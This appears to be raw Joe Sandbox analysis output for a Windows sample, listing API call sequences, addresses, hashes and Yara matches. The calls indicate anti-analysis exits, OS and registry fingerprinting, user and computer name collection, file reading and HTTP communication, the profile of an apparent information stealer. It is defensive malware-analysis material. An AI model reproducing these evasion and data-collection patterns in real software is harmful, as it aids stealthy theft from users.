                                                • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                                APIs
                                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A51
                                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A68
                                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A7F
                                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814AA0
                                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00814AB0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ??2@$CrackInternetlstrlen
                                                • String ID: <
                                                • API String ID: 1683549937-4251816714
                                                • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                • Instruction ID: 3d6f2a9fd30731bb1a093da9ffce2544070fb81aa0d39c7f7b32c1a11b1848ca
                                                • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                • Instruction Fuzzy Hash: 6D213EB5D00219ABDF14DFA8E849ADD7B74FF44321F108225F915A7290EB706A05CF92
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0082790B
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00827912
                                                • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 00827944
                                                • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 00827965
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0082796F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                • String ID: Windows 11
                                                • API String ID: 3225020163-2517555085
                                                • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                • Instruction ID: 7376b08ddaa1a084dde38f75b6035805d404ce1da033a0249ed0f43eb594ac65
                                                • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                • Instruction Fuzzy Hash: 3E017CB9A80308BBEB00DBE5EC49FADBBB9EB08700F004155BA05D6280D67499808B51
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                                • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                                • RegOpenKeyExA.ADVAPI32(80000002,00895EC8,00000000,00020119,00000000), ref: 004176DD
                                                • RegQueryValueExA.ADVAPI32(00000000,008C9010,00000000,00000000,?,000000FF), ref: 004176FE
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                • String ID: Windows 11
                                                • API String ID: 3466090806-2517555085
                                                • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                                • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                                • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                                • RegOpenKeyExA.ADVAPI32(80000002,00895EC8,00000000,00020119,004176B9), ref: 0041775B
                                                • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                                • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                • String ID: CurrentBuildNumber
                                                • API String ID: 3466090806-1022791448
                                                • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                                • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                                APIs
                                                • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                                • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                                • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateHandleSize
                                                • String ID: :A$:A
                                                • API String ID: 1378416451-1974578005
                                                • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                                • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008175A1
                                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00817618
                                                • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00817674
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 008176B9
                                                • HeapFree.KERNEL32(00000000), ref: 008176C0
                                                  • Part of subcall function 008194A7: vsprintf_s.MSVCRT ref: 008194C2
                                                • task.LIBCPMTD ref: 008177BC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                                • String ID:
                                                • API String ID: 700816787-0
                                                • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                • Instruction ID: 239911f163dd521b751c10b0e479f958c1db52037426d860903156d9d133cc7c
                                                • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                • Instruction Fuzzy Hash: C76138B59042689BDB24DB54CC45FE9B7BCFF48300F0085E9E689A6281DBB06BC5CF95
                                                APIs
                                                  • Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D
                                                  • Part of subcall function 008164E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00816548
                                                  • Part of subcall function 008164E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 0081656A
                                                  • Part of subcall function 008164E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0081659C
                                                  • Part of subcall function 008164E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 008165EC
                                                  • Part of subcall function 008164E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00816626
                                                  • Part of subcall function 008164E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00816638
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 0082557F
                                                • lstrlen.KERNEL32(00000000), ref: 00825596
                                                  • Part of subcall function 00829097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008290B9
                                                • StrStrA.SHLWAPI(00000000,00000000), ref: 008255CB
                                                • lstrlen.KERNEL32(00000000), ref: 008255EA
                                                • strtok.MSVCRT(00000000,?), ref: 00825605
                                                • lstrlen.KERNEL32(00000000), ref: 00825615
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                • String ID:
                                                • API String ID: 3532888709-0
                                                • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                • Instruction ID: 2ced5aa9cd6a0b88b2a93a41f80dde55aeae83a535193807eb28d359d4ec2c20
                                                • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                • Instruction Fuzzy Hash: E351E874950228DBCF18EF68EE96AED7779FF20700F904018F906A6592DB346B85CB53
                                                APIs
                                                • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00827345
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                • OpenProcess.KERNEL32(001FFFFF,00000000,00827574,004205BD), ref: 00827383
                                                • memset.MSVCRT ref: 008273D1
                                                • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00827525
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: OpenProcesslstrcpymemset
                                                • String ID:
                                                • API String ID: 224852652-0
                                                • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                • Instruction ID: 0b8a34b29b019a95d37ec8a5c1b4435608da56ecee404a5f349ed2bff9e1a2b1
                                                • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                • Instruction Fuzzy Hash: 29516DB0D04228DBDB14EBA5ED85BEDB7B4FF44305F5040A9E205E6181DB746AC4CF59
                                                APIs
                                                • memset.MSVCRT ref: 0082433C
                                                • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 0082435B
                                                • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 0082437F
                                                • RegCloseKey.ADVAPI32(?), ref: 00824389
                                                • lstrcat.KERNEL32(?,00000000), ref: 008243AE
                                                • lstrcat.KERNEL32(?,0064A168), ref: 008243C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$CloseOpenQueryValuememset
                                                • String ID:
                                                • API String ID: 2623679115-0
                                                • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                • Instruction ID: 3afa9334ddfe2cce6ebd2b4910120362e9d5187bb0c56cdbc8e6cb1d10a52aca
                                                • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                • Instruction Fuzzy Hash: FF41B4B6940108BBDB14EBE0EC4AFEE737DFF49300F005558B625961C1EA7556D88BE2
                                                APIs
                                                • memset.MSVCRT ref: 004140D5
                                                • RegOpenKeyExA.ADVAPI32(80000001,008C9B00,00000000,00020119,?), ref: 004140F4
                                                • RegQueryValueExA.ADVAPI32(?,008C95C8,00000000,00000000,00000000,000000FF), ref: 00414118
                                                • RegCloseKey.ADVAPI32(?), ref: 00414122
                                                • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                                • lstrcatA.KERNEL32(?,008C9520), ref: 0041415B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$CloseOpenQueryValuememset
                                                • String ID:
                                                • API String ID: 2623679115-0
                                                • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                                • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                                APIs
                                                • strtok_s.MSVCRT ref: 00413588
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • strtok_s.MSVCRT ref: 004136D1
                                                  • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00899BA0,?,0042110C,?,00000000), ref: 0041A82B
                                                  • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpystrtok_s$lstrlen
                                                • String ID:
                                                • API String ID: 3184129880-0
                                                • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                                • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                                APIs
                                                • __lock.LIBCMT ref: 0041B39A
                                                  • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                                  • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                                  • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041AFD6
                                                • DecodePointer.KERNEL32(0042A130,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                                • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B3E7
                                                  • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                                • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B40D
                                                • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B420
                                                • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B42A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                • String ID:
                                                • API String ID: 2005412495-0
                                                • Opcode ID: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                                                • Instruction ID: 63863d844e937e4da23c5f373c227dc8c5909fe93770eb0c6870133be37feb4a
                                                • Opcode Fuzzy Hash: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                                                • Instruction Fuzzy Hash: 05314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                                APIs
                                                  • Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00829B08
                                                  • Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00829B21
                                                  • Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00829B39
                                                  • Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00829B51
                                                  • Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00829B6A
                                                  • Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00829B82
                                                  • Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00829B9A
                                                  • Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00829BB3
                                                  • Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00829BCB
                                                  • Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00829BE3
                                                  • Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00829BFC
                                                  • Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00829C14
                                                  • Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00829C2C
                                                  • Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00829C45
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 00811437: ExitProcess.KERNEL32 ref: 00811478
                                                  • Part of subcall function 008113C7: GetSystemInfo.KERNEL32(?), ref: 008113D1
                                                  • Part of subcall function 008113C7: ExitProcess.KERNEL32 ref: 008113E5
                                                  • Part of subcall function 00811377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00811392
                                                  • Part of subcall function 00811377: VirtualAllocExNuma.KERNEL32(00000000), ref: 00811399
                                                  • Part of subcall function 00811377: ExitProcess.KERNEL32 ref: 008113AA
                                                  • Part of subcall function 00811487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008114A5
                                                  • Part of subcall function 00811487: __aulldiv.LIBCMT ref: 008114BF
                                                  • Part of subcall function 00811487: __aulldiv.LIBCMT ref: 008114CD
                                                  • Part of subcall function 00811487: ExitProcess.KERNEL32 ref: 008114FB
                                                  • Part of subcall function 008269D7: GetUserDefaultLangID.KERNEL32 ref: 008269DB
                                                  • Part of subcall function 008113F7: ExitProcess.KERNEL32 ref: 0081142D
                                                  • Part of subcall function 00827AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0081141E), ref: 00827AE7
                                                  • Part of subcall function 00827AB7: RtlAllocateHeap.NTDLL(00000000), ref: 00827AEE
                                                  • Part of subcall function 00827AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00827B06
                                                  • Part of subcall function 00827B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827B77
                                                  • Part of subcall function 00827B47: RtlAllocateHeap.NTDLL(00000000), ref: 00827B7E
                                                  • Part of subcall function 00827B47: GetComputerNameA.KERNEL32(?,00000104), ref: 00827B96
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00826D31
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00826D4F
                                                • CloseHandle.KERNEL32(00000000), ref: 00826D60
                                                • Sleep.KERNEL32(00001770), ref: 00826D6B
                                                • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00826D81
                                                • ExitProcess.KERNEL32 ref: 00826D89
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                • String ID:
                                                • API String ID: 2525456742-0
                                                • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                • Instruction ID: 28c57183d3abcd142ad30f2061e541842fa6332f06c6e3e432a47054ea6a0d80
                                                • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                • Instruction Fuzzy Hash: D3311875A40228ABDB08FBE8EC56AED7379FF14700F500529B112E6592EF745A84CA63
                                                APIs
                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00819C53
                                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00819C78
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00819C98
                                                • ReadFile.KERNEL32(000000FF,?,00000000,008116F6,00000000), ref: 00819CC1
                                                • LocalFree.KERNEL32(008116F6), ref: 00819CF7
                                                • CloseHandle.KERNEL32(000000FF), ref: 00819D01
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                • String ID:
                                                • API String ID: 2311089104-0
                                                • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                • Instruction ID: da5c6069531e31b73b8b305cc690fd2705352f905b94365e60be3e71daf51efc
                                                • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                • Instruction Fuzzy Hash: 333109B8A00209EFDB14CF94D895BEE77F9FF49700F108158E955A7290C774AA81CFA1
                                                APIs
                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
